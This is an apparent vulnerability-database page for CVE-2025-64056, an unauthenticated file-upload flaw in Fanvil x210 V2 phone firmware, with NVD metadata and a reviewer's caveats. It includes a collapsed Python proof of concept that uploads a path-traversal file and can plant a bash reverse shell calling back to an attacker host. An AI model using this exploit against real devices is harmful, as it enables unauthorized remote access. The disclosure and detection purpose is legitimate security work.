Security Vulnerability Report
CVE-2025-64056 CVSS 4.3 MEDIUM

CVE-2025-64056

Published: 2025-12-05 16:15:50
Last Modified: 2026-01-09 02:18:13

Description

File upload vulnerability in Fanvil x210 V2 2.12.20 allows unauthenticated attackers on the local network to store arbitrary files on the filesystem.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:fanvil:x210_firmware:2.12.20:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:fanvil:x210:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
Fanvil x210 V2 固件 2.12.20 及之前版本 (Fanvil x210 V2 firmware 2.12.20 and earlier; note that the NVD CPE match above lists only 2.12.20 as vulnerable)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# NOTE(review): PoC listing for CVE-2025-64056 (CWE-306, missing authentication
# on the upload handler; CVSS 3.1 AV:A / I:L, i.e. reachable only from the
# adjacent network with an integrity-only impact). Read it as evidence of the
# flaw, not as a verified test: check_vulnerability() returns True for any HTTP
# reply regardless of status code and its bare `except:` swallows every error
# type, so it is a liveness probe rather than a vulnerability check, and
# exploit_file_upload() reports success on any 200 without confirming that a
# file was actually written. The listing below is a whitespace-collapsed paste
# and does not parse as Python as shown; it is kept verbatim (the referenced
# SpikeReply advisory holds the original). Defensive signal worth alerting on:
# an unauthenticated multipart POST to /cgi-bin/upload.cgi whose part filename
# contains `../`; mitigation is to keep the device's web management interface
# off untrusted network segments and track the vendor advisory for a fix.
#!/usr/bin/env python3 """ CVE-2025-64056 PoC - Fanvil x210 V2 File Upload Vulnerability Target: Fanvil x210 V2 with firmware <= 2.12.20 Usage: python3 cve-2025-64056.py <target_ip> """ import requests import sys import argparse def exploit_file_upload(target_ip, lhost=None, lport=4444): """ Exploit the unauthenticated file upload vulnerability in Fanvil x210 V2 """ # Target URL - typically the web management interface upload endpoint url = f"http://{target_ip}/cgi-bin/upload.cgi" # Prepare malicious payload - reverse shell script if lhost: payload = f"#!/bin/bash\n/bin/bash -i > /dev/tcp/{lhost}/{lport} 0>&1" else: payload = "#!/bin/bash\necho 'VULNERABLE' > /tmp/pwned.txt" # Construct multipart form data with path traversal files = { 'file': ('../../../../../tmp/shell.sh', payload, 'application/octet-stream'), 'filename': (None, 'test.txt', None) } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Accept': '*/*' } print(f"[*] Target: {target_ip}") print(f"[*] Exploiting file upload vulnerability...") try: response = requests.post(url, files=files, headers=headers, timeout=10) print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] File upload appears successful!") print("[+] Check if shell.sh exists at /tmp/shell.sh") return True else: print(f"[-] Upload failed with status {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False def check_vulnerability(target_ip): """ Check if target is vulnerable by probing the upload endpoint """ url = f"http://{target_ip}/cgi-bin/upload.cgi" try: response = requests.get(url, timeout=5) print(f"[*] Target responds to HTTP requests") print(f"[*] Status: {response.status_code}") return True except: print("[-] Target does not respond") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-64056 PoC') parser.add_argument('target', help='Target IP 
address') parser.add_argument('--lhost', help='Local host for reverse shell') parser.add_argument('--lport', default=4444, help='Local port for reverse shell') args = parser.parse_args() print("=" * 60) print("CVE-2025-64056 - Fanvil x210 V2 File Upload") print("=" * 60) if check_vulnerability(args.target): exploit_file_upload(args.target, args.lhost, args.lport)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64056", "sourceIdentifier": "[email protected]", "published": "2025-12-05T16:15:50.470", "lastModified": "2026-01-09T02:18:13.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File upload vulnerability in Fanvil x210 V2 2.12.20 allows unauthenticated attackers on the local network to store arbitrary files on the filesystem."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fanvil:x210_firmware:2.12.20:*:*:*:*:*:*:*", "matchCriteriaId": "B5339CEB-DD13-43D9-9DBB-F58EA2EDC47D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:fanvil:x210:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "826351F9-626E-4EA9-9634-9E04B462AF4A"}]}]}], "references": [{"url": "http://fanvil.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64056.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}